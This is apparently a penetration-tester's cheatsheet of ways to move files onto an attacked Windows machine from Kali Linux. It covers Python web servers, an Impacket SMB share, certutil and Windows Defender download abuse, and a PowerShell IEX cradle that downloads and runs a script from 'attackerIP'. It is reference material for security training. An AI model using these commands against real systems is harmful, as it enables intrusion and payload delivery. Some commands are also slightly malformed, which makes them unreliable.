Tips & Tricks

# Windows File Transfer Cheatsheet

Wanted to provide a single place to go for all file upload/download techniques when attacking a Windows machine from Kali Linux. This will be updated as I come across new ones and/or the next time I need to use them.

### Python Web Server

The following will start a webserver in the present working directory using Python2.

python -m SimpleHTTP Server 80

The following will start a webserver in the present working directory using Python3.

python3 -m http.server 80

### Impacket SMB Server

We’ll need to perform a few steps to set this up, but it’s a great way to transfer files to/from a system. To begin, let’s create a directory called smb on our attacking system. Files in this directory will be available on the other end, and likewise, the other end will be able to place files into this directory.

mkdir smb

impacket-smbserver <sharename> <path>

Then we can mount this file share in PowerShell from the other side.

New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName>

And change into the new drive.

cd <ShareName>:

### PowerShell

Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe"

The following will download and automatically execute the remote PowerShell script when ran from a command prompt.

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')

### CertUtil

certutil.exe -urlcache -f "http://attackerIP/file.exe" file.exe

### Windows Defender

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]
scp /path/to/file username@a:/path/to/destination
scp username@b:/path/to/file /path/to/destination